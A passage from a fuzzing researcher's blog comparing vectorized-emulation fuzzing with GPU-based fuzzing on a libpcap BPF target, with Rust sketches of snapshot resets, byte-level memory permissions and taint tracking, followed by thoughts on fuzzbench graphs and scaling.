<span class="mi">1</span><span class="p">,</span> <span class="n">PCAP_NETMASK_UNKNOWN</span><span class="p">);</span>
<span class="k">assert</span><span class="o">!</span><span class="p">(</span><span class="n">status</span> <span class="o">==</span> <span class="mi">0</span><span class="p">,</span> <span class="s">"Failed to compile pcap thingy"</span><span class="p">);</span>
<span class="k">let</span> <span class="n">buf</span> <span class="o">=</span> <span class="nd">vec!</span><span class="p">[</span><span class="mi">0x41u8</span><span class="p">;</span> <span class="mi">1500</span><span class="p">];</span>
<span class="c">// Filter a packet</span>
<span class="nf">bpf_filter_with_aux_data</span><span class="p">(</span>
<span class="n">program</span><span class="py">.bf_insns</span><span class="p">,</span>
<span class="n">buf</span><span class="nf">.as_ptr</span><span class="p">(),</span>
<span class="n">buf</span><span class="nf">.len</span><span class="p">()</span> <span class="k">as</span> <span class="nb">u32</span><span class="p">,</span>
<span class="n">buf</span><span class="nf">.len</span><span class="p">()</span> <span class="k">as</span> <span class="nb">u32</span><span class="p">,</span>
<span class="nn">std</span><span class="p">::</span><span class="nn">ptr</span><span class="p">::</span><span class="nf">null</span><span class="p">()</span>
<span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">fn</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span>
<span class="nf">fuzz_external</span><span class="p">();</span>
<span class="p">}</span>
</code></pre></div></div>
<p>This is effectively the same as above, but it no longer loops. But, since I’m using a binary-based snapshot fuzzer, and so are they, we’re going to actually snapshot it. So, instead of running this entire program every fuzz case, I’m going to put a breakpoint on the first instruction of <code class="language-plaintext highlighter-rouge">bpf_filter_with_aux_data</code>, and run the RISC-V JIT until it hits it. Once it hits that breakpoint, I will make a snapshot of the memory state, and at that point I will create threads which will work on executing it in a loop.</p>
<p>Further, I will add another breakpoint on the return site of <code class="language-plaintext highlighter-rouge">bpf_filter_with_aux_data</code> to immediately terminate the fuzz case upon return. This avoids having the program do cleanup (like freeing <code class="language-plaintext highlighter-rouge">buf</code>), and otherwise bubbling up to an <code class="language-plaintext highlighter-rouge">exit()</code> syscall. Their blog isn’t super clear about this, but from their wording, I suspect this is a pretty similar setup. Effectively, only <code class="language-plaintext highlighter-rouge">bpf_filter_with_aux_data</code> is executing, and once it is not, the VM is reset and run again.</p>
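<p>As a rough illustration of that cycle (all types, names, and addresses below are made up for the sketch, not the real emulator’s API), the snapshot-and-reset loop looks something like this:</p>

```rust
// Hypothetical sketch of snapshot fuzzing: `Vm`, the addresses, and
// `run_until` are illustrative only, not the real emulator's API.

#[derive(Clone)]
struct Vm {
    memory: Vec<u8>,
    pc: u64,
}

impl Vm {
    /// Run the guest until `pc` reaches `breakpoint` (stubbed out here).
    fn run_until(&mut self, breakpoint: u64) {
        self.pc = breakpoint;
    }
}

/// One fuzz case: restore the VM to the snapshot taken at the entry of
/// the target function, then run until the return-site breakpoint.
fn run_case(snapshot: &Vm, vm: &mut Vm, ret_site: u64) -> u64 {
    // Reset all VM state back to the snapshot (in practice this is a
    // differential reset which only restores dirtied memory)
    vm.memory.copy_from_slice(&snapshot.memory);
    vm.pc = snapshot.pc;

    // Run the fuzz case to completion
    vm.run_until(ret_site);
    vm.pc
}

fn main() {
    // "Snapshot" taken at the breakpoint on the target function's entry
    let snapshot = Vm { memory: vec![0u8; 4096], pc: 0x1000 };
    let mut vm = snapshot.clone();

    // Worker threads would each do this in a loop
    for _ in 0..3 {
        assert_eq!(run_case(&snapshot, &mut vm, 0x2000), 0x2000);
    }
}
```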
<p>My emulator has many different operating modes. I have different coverage levels (covering blocks, covering PCs, etc), different levels of memory protection (eg. byte-level permissions which cause every byte to have its own permissions), uninitialized memory tracking (accessing allocated memory and stacks is invalid unless it has been written to first), as well as register taint tracking (logging when user input affected register state for both register reads and writes).</p>
<p>Since many of these vary in performance, I’ve set up a few tests with a few common configurations. Further, I’ve provisioned a 60 core <code class="language-plaintext highlighter-rouge">c2-standard-60</code> (30 Cascade Lake Intel cores, totalling 60 hyper-threads) machine from Google Cloud Platform to try to compare apples-to-apples as best I can. This machine costs $3.1321/hour, and thus we’ll have to divide by these costs to make it fair when we do dollar-based comparisons.</p>
<p>Here… we… go!</p>
<p><img src="/assets/libpcap_perf.png" alt="image" /></p>
<p>Okay cool, so what is this graph telling us? Well, it’s showing us the number of iterations per second per core on the Y axis, against the number of cores being used on the X axis. This is not just telling me the overall performance, but also the scaling performance of the fuzzer, or how well it uses cores.</p>
<p>We’re going to ignore all lines other than the top line, the one in purple (blue?). We see that the line is relatively flat until 30 cores, then it starts falling off. This is great! This lines up ideally with what we want. The emulator is scaling linearly as cores are added, until we get past 30 cores, where the additional threads are hyper-threads rather than physical cores. The fact that the line is flat until 30 cores makes me very happy, and a lot of painstaking engineering went into making that work!</p>
<p>Anyways, we have multiple lines here. The top line, to no surprise, is gathering no coverage information, isn’t tracking taint, nor is it checking permissions. Of course it’s the fastest. The next line, in green, only adds block-level code coverage. It’s almost no performance hit, nor would I expect it to be. The JIT self-modifies once coverage has been reported, and thus the only cost is a bit of icache pollution due to some nopped-out code being jumped over.</p>
<p>Next, we have the light blue line, which, at this stage, is the first line that actually matters. This one adds checking of permissions, as well as uninitialized memory tracking. This is done at a byte level, and thus behaves very similarly to ASAN (in fact, it allows arbitrary byte-sized holes in memory, where ASAN can only mark trailing bytes as inaccessible). This, of course, has a performance cost. And this is the real line: there’s no way I’d ever run a fuzzer without permission checks, as the target would simply crash the host. I could use a more relaxed permission checking model (like using the hardware MMU on Intel to provide 512-byte-level permissions (4096-byte pages / 8 VMs interleaved per page)), and I’d have the green line in performance, but it’s not worth it. Byte level is too important to me.</p>
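<p>For a sense of what byte-level permissions with uninitialized memory tracking look like, here is a minimal sketch. The names and bit layout are my own for the example; the real implementation is JITted and vectorized, but the semantics are similar: a fresh allocation is writable, and a byte only becomes readable once it has been written.</p>

```rust
// Illustrative byte-level permission model; bit names and layout are
// assumptions for this sketch, not the real emulator's encoding.

const PERM_READ:  u8 = 1 << 0;
const PERM_WRITE: u8 = 1 << 1;
// "Read-after-write": the byte becomes readable only once written, which
// is how uninitialized-memory tracking falls out of the same mechanism.
const PERM_RAW:   u8 = 1 << 2;

struct Memory {
    bytes: Vec<u8>,
    perms: Vec<u8>, // one permission byte per data byte
}

impl Memory {
    fn write(&mut self, addr: usize, val: u8) -> Result<(), ()> {
        if self.perms[addr] & PERM_WRITE == 0 { return Err(()); }
        self.bytes[addr] = val;
        // Writing an uninitialized byte makes it readable from now on
        if self.perms[addr] & PERM_RAW != 0 {
            self.perms[addr] |= PERM_READ;
        }
        Ok(())
    }

    fn read(&self, addr: usize) -> Result<u8, ()> {
        if self.perms[addr] & PERM_READ == 0 { return Err(()); }
        Ok(self.bytes[addr])
    }
}

fn main() {
    // Fresh allocation: writable, readable only after the first write
    let mut mem = Memory {
        bytes: vec![0; 16],
        perms: vec![PERM_WRITE | PERM_RAW; 16],
    };
    assert!(mem.read(0).is_err());      // uninitialized read is caught
    mem.write(0, 0x41).unwrap();
    assert_eq!(mem.read(0).unwrap(), 0x41);
    assert!(mem.read(1).is_err());      // neighboring byte still poisoned
}
```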
<p>Finally, we have the orange line. This one adds register “taint” tracking. This effectively horizontally looks at neighboring VMs during execution to determine if one VM has written or read a different register value than its neighbors. This allows me to observe and feed back information about which register values are influenced by the user input, and thus is important information for cutting down on mutation waste. That being said, we’re not mutating, so it doesn’t really matter; we’re just looking at the runtime costs of this instrumentation.</p>
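<p>Conceptually, the taint check can be thought of as comparing each register lane against its neighbors after an update; any divergence means the differing inputs influenced that register. Here is a scalar toy version of the idea (my own simplification; the real thing is done with wide vector lane compares):</p>

```rust
// Toy model of lane-divergence taint tracking. Eight VMs run in lockstep;
// if a register's value differs between lanes, the (differing) inputs
// must have influenced it.

/// Return a bitmask of which of the 8 lanes hold a value differing from
/// lane 0 for this register (a divergence implies input influence).
fn taint_mask(reg_lanes: &[u64; 8]) -> u8 {
    let mut mask = 0u8;
    for (i, &v) in reg_lanes.iter().enumerate() {
        if v != reg_lanes[0] {
            mask |= 1 << i;
        }
    }
    mask
}

fn main() {
    // All lanes agree: register is untouched by input differences
    let same = [5u64; 8];
    assert_eq!(taint_mask(&same), 0);

    // VM 3 computed something input-dependent
    let mut diverged = [5u64; 8];
    diverged[3] = 9;
    assert_eq!(taint_mask(&diverged), 1 << 3);
}
```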
<p>Where does this leave us? Well, we see that on the 60 core machine, with the light blue line (the one we care about), we end up getting about 4.1 million iterations per second per core. Since we’re running 60 cores (technically 60 threads) at this rate, we can just multiply to see that we’re getting about 250 million iterations per second on this 60 core <code class="language-plaintext highlighter-rouge">c2-standard-60</code> machine.</p>
<p>Well, this is the number we want. What does this come out to for iterations/second/$? Simply divide 250 million by $3.1321/hour, and we get about <strong>79.8 million iters/second/dollar/hour</strong>.</p>
<p>I don’t have access to their GPU code so I can’t reproduce it, but their number they claim is 8.4M iterations/second on the $0.35/hour GPU, and thus, 23.9 million iters/second/dollar/hour.</p>
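<p>The per-dollar figures above are straightforward arithmetic; a quick sketch reproduces them:</p>

```rust
// Reproducing the cost-effectiveness arithmetic from the text.
fn iters_per_dollar_hour(iters_per_sec: f64, dollars_per_hour: f64) -> f64 {
    iters_per_sec / dollars_per_hour
}

fn main() {
    // Vectorized emulation: ~250M iters/sec on the $3.1321/hour c2-standard-60
    let vecemu = iters_per_dollar_hour(250e6, 3.1321);
    assert!((vecemu / 1e6 - 79.8).abs() < 0.1); // ~79.8M iters/sec/$/hour

    // GPU: 8.4M iters/sec on the $0.35/hour Tesla T4
    let gpu = iters_per_dollar_hour(8.4e6, 0.35);
    assert!((gpu / 1e6 - 24.0).abs() < 0.1);    // ~24M iters/sec/$/hour

    // Roughly a 3x per-dollar advantage for vectorized emulation
    assert!(vecemu / gpu > 3.0 && vecemu / gpu < 3.5);
}
```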
<p>This gives vectorized emulation about a <em>3x advantage for performance per dollar</em> compared to the GPU based compute. It’s important to note, both technologies have some pretty large improvements to performance which may be possible. I suspect with some optimization both could probably see 2-3x improvements, but at that point they start hitting some very real hardware limitations in performance.</p>
<h1 id="where-does-this-leave-us">Where does this leave us?</h1>
<p>I have some suspicions that GPUs will struggle with low latency memory accesses, especially when so many VMs are diverging and doing different things. These benchmarks are best case for both these technologies, as the inputs aren’t affecting execution flow, and the memory utilization is quite low.</p>
<p>GPUs have some major memory limitations that I think make them impractical for fuzzing. As mentioned in the ToB blog, a 16 GiB GPU running 40,000 threads only has 419 KiB per thread available for storage. This means the corpuses, coverage databases, and all memory modified by a fuzz case must be below 419 KiB. This unfortunately isn’t a very practical limit. Right now I’m doing some freetype2 fuzzing in light of the Google Project Zero <a href="https://savannah.nongnu.org/bugs/?59308">CVE-2020-15999</a>, and I’m pushing 50 GiB of memory use for the 1,536 VMs I run. Vecemu does memory deduplication and CoW for all memory, and thus my memory use is quite low. Ultimately, there are user-controlled allocations that occur and re-claiming the memory every fuzz case doesn’t prove very feasible. This is also a tiny target; I fuzz many targets where the input alone exceeds 1 MiB, let alone other memory used by the target.</p>
<p>Nevertheless, I think these problems may be solvable with creative use of transferring memory in blocks, or maybe chunking fuzz cases into sections which use less than 400 KiB at a time, or maybe just reducing the number of threads. There are definitely solutions here, and I definitely don’t doubt that it’s possible, but I do wonder if the overheads and complexities beat what can be done directly on the CPU with massive caches and access to all memory at a relatively low cost (as opposed to GPU<->CPU memory access).</p>
<h1 id="is-there-more-perf">Is there more perf?</h1>
<p>It’s important to note that my vectorized emulation is not running faster than native execution. I’m still emulating RISC-V and applying some really strict memory permission checks that slow things down; this makes my memory accesses really expensive. I am happy to see though, that vectorized emulation looks to be within about ~3x of native execution (18M packets/second in our native libpcap harness mentioned early on, 5.5M with ours). This is pretty crazy, given we’re working with binaries and applying byte-level permissions to a target which isn’t even supported by ASAN! How cool is that!?</p>
<p>Vectorized emulation runs close to or faster than native execution when the target has few memory loads and stores. This is by far the bottleneck (~80%+ of CPU time is spent doing my memory translations). Doing some optimization passes to reduce memory loads and stores in my IL would probably allow me to realize some of these gains.</p>
<p>Since I’m not running at native speeds, we know that this isn’t as fast as could be done by just building libpcap for x86 and running it. Of course this requires source, but we know that we can get about a 3x speedup by fuzzing it natively. Thus, if I have a 3x improvement on the GPU fuzzing cost effectiveness, and there’s a 3x speedup from my emulation to just “running it natively on x86”, then there’s a 9x improvement from GPU execution to just run it natively.</p>
<p>This kinda… proves my earlier point. The benchmark is not comparing libfuzzer to the GPU fuzzer, it’s comparing the GPU fuzzer running a target, compared to libfuzzer performing orchestration of a fuzzer and mutations. It’s just… not really comparing anything valuable. But of course, like I always complain about, public fuzzer performance is often not great. There are improvements we can get to our fuzzing harnesses, and as always, I implore people to explore the powers of in-memory, snapshot based fuzzing! Every time you do IPC, update an atomic, update/check a database, do an allocation, etc, you lose a lot of performance (when running at these speeds). For example, in vectorized emulation for this very blog, I had to batch my fuzz case increments to only happen a few times a second. Having all threads updating an atomic ~250M times a second resulted in about a 60% overall slowdown of the entire harness. When doing super tight loop fuzzing like this (as uncommon as it may be), the way we write fuzzing harnesses just doesn’t work.</p>
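<p>The fix for that atomic counter problem is simple batching: keep a thread-local count and only flush it to the shared atomic occasionally. A sketch of the idea (the flush interval here is arbitrary):</p>

```rust
// Batched statistics: each worker accumulates fuzz case counts locally
// and only touches the shared atomic rarely, instead of hammering it
// hundreds of millions of times a second.
use std::sync::atomic::{AtomicU64, Ordering};
use std::sync::Arc;
use std::thread;

/// Spawn `workers` threads which each "execute" `cases` fuzz cases,
/// batching counter updates to reduce contention on the shared atomic.
fn run_workers(workers: usize, cases: u64) -> u64 {
    let total = Arc::new(AtomicU64::new(0));
    let handles: Vec<_> = (0..workers).map(|_| {
        let total = Arc::clone(&total);
        thread::spawn(move || {
            let mut local = 0u64;
            for case in 0..cases {
                // ... a fuzz case would run here ...
                local += 1;
                // Flush to the shared counter only every 64k cases
                if (case & 0xffff) == 0xffff {
                    total.fetch_add(local, Ordering::Relaxed);
                    local = 0;
                }
            }
            // Flush whatever is left when the worker exits
            total.fetch_add(local, Ordering::Relaxed);
        })
    }).collect();
    for h in handles { h.join().unwrap(); }
    total.load(Ordering::Relaxed)
}

fn main() {
    // No cases are lost, but the atomic is touched ~64,000x less often
    assert_eq!(run_workers(4, 1_000_000), 4_000_000);
}
```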
<h2 id="but-wait-what-even-are-these-dollar-amounts">But wait… what even are these dollar amounts?</h2>
<p>So, it seems that vectorized emulation is only slightly faster than the GPU results (~3x). Vectorized emulation also has years of research into it, and the GPU research is fairly new. This 3x advantage is honestly not a big deal, it’s below the noise floor of what really matters when it comes to accessibility of hardware. If you can get GPUs or GPU developers easier than AVX-512 CPUs and developers, the 3x difference isn’t going to make a difference.</p>
<p>But we have to ask, why are we comparing dollar amounts? The dollar amounts are largely to determine what is most cost effective, that makes sense. But… something doesn’t seem right here.</p>
<p>The GPU they are using is an NVIDIA Tesla T4 and costs $0.35/hour on Google Cloud Platform. The CPU they are using (for libfuzzer) is a quad core Skylake which costs $0.38/hour, or almost 10% more. What? An NVIDIA Tesla T4 is $2,152 (cheapest price I could find), and a quad core Skylake is $150. What the?</p>
<p>Once again, I hate the cloud. It’s a pretty big ripoff for long-running compute, but of course, it can save you IT costs and allow you to dynamically spin up.</p>
<p>But, for funsies, let’s check the performance per dollar for people who actually buy their hardware rather than use cloud compute.</p>
<p>For these benchmarks I’m going to use my own server that I host in my house and purchased for fuzzing. It’s a quad socket Xeon 6252N, which means that in total it has 96 cores and 192 threads, clocking at 2.3 GHz base, turboing to 3.6 GHz. The MSRP (and price I paid) for these processors is $1788. Thus, ~$7,152 for just the processors. Throw in about $2k for a server-grade chassis + motherboard + power supplies, and then ~$5k for 768 GiB of RAM, and you get to the $14-15k mark that I paid for this server. But, we’ll simplify it a bit, we don’t need 768 GiB of RAM for our example, so we’ll figure out what we want in GPUs.</p>
<p>For GPUs, the Tesla T4s are $2,152 per GPU, and have 16 GiB of RAM each. Let’s just ignore all the PCI slotting, motherboards, and CPU required for a machine to host them, and we’ll just say we build the cheapest possible chassis, motherboard, PSU, and CPUs, and somehow can socket these in a $1k server. My server is about $9k just for the 4 CPUs + $2k in chassis and motherboards, and thus that leaves us with $8k budget for GPUs. Let’s just say we buy 4 Tesla T4s and throw them in the $1k server, and we got them for $2k each. Okay, we have a 4 Tesla T4 machine and a 4 socket Xeon 6252N server for about $9k. We’re fudging some of the numbers to give the GPUs an advantage since a $1k chassis is cheap, so we’ll just say we threw 64 GiB into the server to match the GPUs’ RAM and call it “even”.</p>
<p>Okay, so we have 2 theoretical systems. One with 96C/192T of Xeon 6252Ns and 64 GiB RAM, and one with 4 Tesla T4s with 64 GiB VRAM. They’re about $9k-$11k depending on what deals you can get, so we’ll say each one was $9k.</p>
<p>Well, how does it stack up?</p>
<p>I have the 4x 6252N system, so we’ll run vectorized emulation in “light blue” line mode (block coverage, byte-level permissions, uninitialized mem tracking, and no register taint tracking); this is a common mode for when I’m not fuzzing too deep on a target. Well, let’s light up those cores.</p>
<p><img src="/assets/lolcores.png" alt="lolcores" /></p>
<p>Sweet, we’re under 10 GiB of memory usage for the whole system, so we’re not really cheating by skimping on the memory in our theoretical 64 GiB build.</p>
<p>Well, we’re getting about <strong>700 million fuzz cases per second on the whole system</strong>. Woo! That’s a shitton! That is <em>77k iters/second/$</em>. Obviously this seems “lower” than what we saw before, but this is the iters/second for a one-time dollar investment, not a per-hour cloud fee.</p>
<p>So… what do we get on the GPU? Well, they concluded with getting 8.4 million iters/sec on the cloud compute GPU. Assuming it’s close to the performance you get on bare metal (since they picked the non-preemptable GPU option), we can just multiply this number by 4 to get the iters/sec on this theoretical machine. We get 33.6 million iterations per second total, if we had 4 GPUs (assuming linear scaling and stuff, which I think is totally fair). Well… that’s 3,733 iters/second/$… or about 21x more expensive than vectorized emulation.</p>
<p>What gives? Well, the CPUs will definitely use more power: at 150W each you’ll be pushing 600W minimum, but I observe more in the ballpark of 1kW when running this server, including peripherals and the rest of the system. The Tesla T4 is 70W each, totalling 280W. These would likely be in a system which takes about 200W to run the CPU, chassis, RAM, etc, so let’s say 500W, about half the wattage of the CPU-based solution. Given power is pretty cheap (especially in the US), this difference isn’t too major. I pay $0.10/kWh; doubling for cooling, the CPU server would cost about $0.20 per hour and the GPU build about $0.10 per hour. These are my “cloud compute” runtime costs, and thus the <em>GPUs are still about 10x more expensive per iteration to run than the CPU solution</em>.</p>
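<p>For those following along, the owned-hardware numbers in the last few paragraphs check out with simple arithmetic:</p>

```rust
// Reproducing the owned-hardware cost arithmetic from the text.
fn iters_per_dollar(iters_per_sec: f64, price: f64) -> f64 {
    iters_per_sec / price
}

fn main() {
    // One-time ~$9k machine price for each theoretical build
    let cpu = iters_per_dollar(700e6, 9_000.0);  // vectorized emulation
    let gpu = iters_per_dollar(33.6e6, 9_000.0); // 4x Tesla T4 (4 * 8.4M)
    assert!((cpu - 77_778.0).abs() < 1_000.0);   // ~77k iters/sec/$
    assert!((gpu - 3_733.0).abs() < 10.0);       // ~3.7k iters/sec/$
    assert!(cpu / gpu > 20.0 && cpu / gpu < 22.0); // ~21x gap

    // Hourly power cost at $0.10/kWh, doubled for cooling
    let cpu_hourly = 1.0_f64 * 0.10 * 2.0; // ~1 kW observed  -> $0.20/hr
    let gpu_hourly = 0.5_f64 * 0.10 * 2.0; // ~500 W estimate -> $0.10/hr
    let ratio = (700e6 / cpu_hourly) / (33.6e6 / gpu_hourly);
    assert!(ratio > 10.0 && ratio < 11.0); // still ~10x in the CPU's favor
}
```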
<h2 id="conclusion">Conclusion</h2>
<p>As I’ve mentioned, this GPU based fuzzing stuff is incredibly cool. I can’t wait to see more. Unfortunately, some of the methodologies of the comparison aren’t very fair and thus I think the claims aren’t very compelling. It doesn’t mean the work isn’t thrilling, amazing, and incredibly hard, it just means it’s not really time yet to drop what we’re doing to invest in GPUs for fuzzing.</p>
<p>There’s a pretty large discrepancy in the cost effectiveness of GPUs in the cloud, and the ToB blog ends up getting a pretty large advantage over libfuzzer for something that is really just a pricing decision by the cloud providers. When purchasing your own gear, the GPUs are about 10x more expensive than the CPUs that were used in the blog’s tests (quad-core Skylake @ $200 or so vs an NVIDIA T4 @ $2,000). The cloud prices do not reflect this difference, and in the cloud, these two solutions are the same price. That being said, those are real gains. If GPUs are that much more cost effective in the cloud, then we should definitely try to use them!</p>
<p>Ultimately, when buying the hardware, the GPU solution is about 20x less cost effective than a CPU based solution (vectorized emulation). But even then, vectorized emulation is an emulator, and slower than native execution by a factor of 3, thus, compared to a carefully crafted, low-overhead fuzzer, the GPU solution is actually about 60x less cost effective.</p>
<p>But! The GPU solution (as well as vectorized emulation) allow for running closed-source binary targets in a highly efficient way, and that definitely is worth a performance loss. I’d rather be able to fuzz something at a 10x slowdown, than not being able to fuzz it at all (eg. needing source)!</p>
<p>Hats off to everyone at Trail of Bits who worked on this. This is incredibly cool research. I hope this blog didn’t come off as harsh, it’s mainly just me recording my thoughts as I’m always chasing the best solution for fuzzing! If that means I throw away vecemu to do GPU-based fuzzing, I will do it in a heartbeat. But, that decision is a heavy one, as I would need to invest thousands of hours in GPU development and retool my whole server room! These decisions are hard for me to make, and thus, I have to be very critical of all the evidence.</p>
<p>I can’t wait to see more research from you all! This is incredible. You’re giving me a real run for my money, and in only 2 months of work, fucking amazing! See you soon!</p>
<hr />
<h2 id="random-opinions">Random opinions</h2>
<p>I’ve been asked a few things about my opinion on the GPU-based fuzzing, I’ll answer them here.</p>
<h1 id="is-not-having-syscalls-a-problem">Is not having syscalls a problem?</h1>
<p>No. It’s not. It is for people who want to <em>use</em> the tool. But this is a research tool for exploring what is possible; the act of fuzzing on a GPU by running binary-translated code is incredible, and that’s the focus here! GPUs are Turing complete, so we can definitely emulate syscalls on them if needed. It might be a lot of work, a lot of plumbing, maybe a perf hit, but it doesn’t stop it from being possible. Most of my fuzzers rely on emulating syscalls.</p>
<p>There’s also nothing preventing GPUs from being used to emulate a whole OS. You’d have to handle self-modifying code and virtual memory, which can get very expensive in an emulator, but with software TLBs these things can be kept manageable to the point where it’s still worth doing!</p>
<hr />
<h2 id="social">Social</h2>
<p>I’ve been streaming a lot more regularly on my <a href="https://twitch.tv/gamozo">Twitch</a>! I’ve developed hypervisors for fuzzing, mutators, emulators, and just done a lot of fun fuzzing work on stream. Come on by!</p>
<p>Follow me at <a href="https://twitter.com/gamozolabs">@gamozolabs</a> on Twitter if you want notifications when
new blogs come up. I often will post data and graphs from data as it comes in
and I learn!</p>
<hr />
<p><strong>Some thoughts on fuzzing</strong> (2020-08-11): <a href="https://gamozolabs.github.io/2020/08/11/some_fuzzing_thoughts">https://gamozolabs.github.io/2020/08/11/some_fuzzing_thoughts</a></p>
<h1 id="foreward">Foreword</h1>
<p>This blog is a bit weird, this is actually a message I posted in response to a fuzzbench issue, but honestly, I think it warranted a blog, even if it’s a bit unpolished!</p>
<p>You can find the discussion at <a href="https://github.com/google/fuzzbench/issues/654">fuzzbench issue tracker #654</a></p>
<h1 id="social">Social</h1>
<p>I’ve been streaming a lot more regularly on my <a href="https://twitch.tv/gamozo">Twitch</a>! I’ve developed hypervisors for fuzzing, mutators, emulators, and just done a lot of fun fuzzing work on stream. Come on by!</p>
<p>Follow me at <a href="https://twitter.com/gamozolabs">@gamozolabs</a> on Twitter if you want notifications when
new blogs come up. I often will post data and graphs from data as it comes in
and I learn!</p>
<h1 id="the-blog">The blog</h1>
<p>Hello again!</p>
<p>So, I’d like to address a few things that I’ve thought of a bit more over time and want to emphasize.</p>
<h1 id="visualizations-and-what-im-often-looking-for-in-data">Visualizations, and what I’m often looking for in data</h1>
<p>When it comes to visualizations, I don’t really mind much which graphs are displayed by default, linear vs logscale, time-based or per-case-based, but both should be toggleable in the default view. I’m not a web dev, but having an interactive graph would be pretty nice, allowing for turning certain lines on and off, zooming in and out, and changing scales/axes. But, I think we’re in agreement here. I personally believe that logscale should be the default, and I don’t see how it’s anything but better, unless you only care about seeing where things “flatten out”. But even in that case, it’s just as visible in logscale, you just have to be logscale aware.</p>
<p>Here’s an example of what I typically graph when I’m running and tuning a fuzzer. I’m doing side-by-side comparisons of small fuzzer tweaks against my prior best runs, and plotting both on a time domain and a fuzz case domain. I’ve included the linear-scale plots just for comparison with the way we currently do things, but I personally never use linear scale as I just find it to be worse in all aspects.</p>
<p><img src="/assets/how_i_viz_fuzzers.png" alt="image" /></p>
<p>By using a linear scale, we’re unable to see anything about what happens in the fuzzer in the first ~20 min or so. We just see a vertical line. In the log scale we see a lot more of what is happening. This graph is comparing a fuzzer which does <code class="language-plaintext highlighter-rouge">rand() % 20</code> rounds of mutation (medium corruption), versus <code class="language-plaintext highlighter-rouge">rand() % 5</code> rounds of the same corruption (low corruption). We can see that early on medium corruption has much better properties, as it explores more aggressively. But there’s actually a point where they cross, and this is likely the point where the corruption becomes too great on average in the medium corruption, and ends up “ruining” previously good inputs, dramatically reducing the frequency we see good cases. It’s important to note that since the medium corruption is a superset of low corruption (eg. there’s a chance to do low corruption), both graphs would eventually converge to the exact same value.</p>
<p>There’s just so much information in this graph that stands out to me. I see that something about medium corruption performs well in the first ~100 seconds. There’s a really good lead at the early few seconds, and it tapers off throughout. This gives me feedback on maybe when and where I should use this level of corruption.</p>
<p>Further, since I have both a fuzz case graph and a time graph, I can see that medium corruption early on actually has better performance than low corruption. Once again, this makes sense, the more corruption, the more likely you are to make a more invalid input which is parsed more shallow. But from the coverage over case, I see that this isn’t a long term thing and eventually the performance seems to converge between the two. It’s important to note, the intersection point of the two lines varies by quite a bit in both the case domain and the time domain. This tells me that even though I just changed the mutator, it has affected the performance, likely due to the depth of the average input in the corpus, really neat!</p>
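<p>For the curious, the two mutators being compared differ only in the round count; the corruption primitive itself isn’t shown in this post, so the one below is a stand-in (a simple random byte overwrite with a toy xorshift RNG):</p>

```rust
// Hypothetical shape of the two mutators: identical corruption primitive,
// differing only in the number of rounds applied per case. The primitive
// here (random byte overwrite) is a stand-in, not the fuzzer's real one.

// Tiny deterministic xorshift RNG so the example is self-contained
struct Rng(u64);
impl Rng {
    fn next(&mut self) -> u64 {
        self.0 ^= self.0 << 13;
        self.0 ^= self.0 >> 7;
        self.0 ^= self.0 << 17;
        self.0
    }
}

/// "Medium" corruption passes max_rounds = 20, "low" passes 5.
fn mutate(input: &mut [u8], rng: &mut Rng, max_rounds: u64) {
    let rounds = rng.next() % max_rounds;
    for _ in 0..rounds {
        let idx = rng.next() as usize % input.len();
        input[idx] = rng.next() as u8; // one corruption: overwrite a byte
    }
}

fn main() {
    let mut rng = Rng(0x1234_5678_9abc_def0);
    let original = vec![0u8; 64];

    let mut medium = original.clone();
    mutate(&mut medium, &mut rng, 20);

    let mut low = original.clone();
    mutate(&mut low, &mut rng, 5);

    // Low corruption never exceeds 4 rounds, so at most 4 bytes differ
    // from the original input; medium is a superset of this behavior.
    let changed = low.iter().zip(&original).filter(|(a, b)| a != b).count();
    assert!(changed <= 4);
}
```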
<h4 id="example-analysis-conclusion">Example analysis conclusion</h4>
<p>I see that medium corruption in this case is giving me about 10x speedup in time-to-same-coverage, and also some performance benefits early on. I should adopt a dynamic corruption model which tunes this corruption amount maybe against time, or ideally, some other metric I could extract from the target or stats. I see that long-term, the low corruption starts to win, and for something that I’d run for a week, I’d much rather run the low corruption.</p>
<p>Even though this program is very simple, these graphs could pretty arbitrarily be stretched out to different time axes. If <a href="https://github.com/google/fuzzbench">fuzzbench</a> picks a deadline, for example, 1000 seconds, we would never know this about the fuzzer performance. I think this is likely what many fuzzers are now being tuned to, as the benchmarks often are 12/24/72 hour increments. Fuzzers often get some extra blips even deeper in the runs, and it’s really hard to estimate if these crosses would ever occur.</p>
<h1 id="the-case-for-cases">The case for cases</h1>
<p>I personally extract most information from graphs which are plotted against number of fuzz cases rather than time. By doing benchmarks in a time domain, you factor in the performance of the fuzzer. This is the ground truth, and what really matters at the end of the day with complete products. But it’s not the ground truth for fuzzers in development. For example, if I wanted to prototype a new mutation strategy for AFL, I would be forced to do it in C, avoid inefficient copies, avoid mallocs, etc. I effectively have to make sure my mutator is at-or-better than existing AFL mutator performance to use benchmarks like this.</p>
<p>When you do development on fuzz cases, you can start to inspect the efficiency of the fuzzer in terms of quality of cases produced. I could prototype a mutator in python for all I care, and see if it performs better than the stock AFL mutators. This allows me to cut corners and spend 1 day trying out a mutator, rather than 1 month making a mutator and then doing complex optimizations to make it work. During early stages of development, I would expect a developer to understand the ramifications of making it faster, and to have a ballpark idea of where it could be if the O(n^3) logic was turned into O(log n), and whether it’s possible.</p>
<p>Often times, the first pass of an attempt is going to be crude, and for no reason other than laziness (and not in a negative way)! There’s a time and a place to polish and optimize a technique, and it’s important that there can be information learned from very preliminary results. Most performance in standard feedback mechanisms and mutation strategies can be solved with a little bit of engineering, and most developers should be able to gauge the best-case big-O for their strategy, even if that’s not the algorithmic complexity of their initial implementation.</p>
<p>Yep, looking at coverage over cases adds nuance, but I think we can handle it. Given most fuzzing tools, especially initial passes, are already so un-optimized, I’m really not worried about any performance differences in AFL/libfuzzer/etc when it comes to single-core performance.</p>
<h1 id="scaling">Scaling</h1>
<p>Scaling of performance is really missing from <a href="https://github.com/google/fuzzbench">fuzzbench</a>. At every company I’ve worked at, big and small, even for the simplest targets we’re fuzzing we’re running at least ~50-100 cores. I presume (I don’t know for sure) that <a href="https://github.com/google/fuzzbench">fuzzbench</a> is comparing single core performance. That’s great, it’s a useful stat and one I often control for, as single-core coverage/case controls for both scaling and performance, leading to great introspection into the raw logic of the fuzzer.</p>
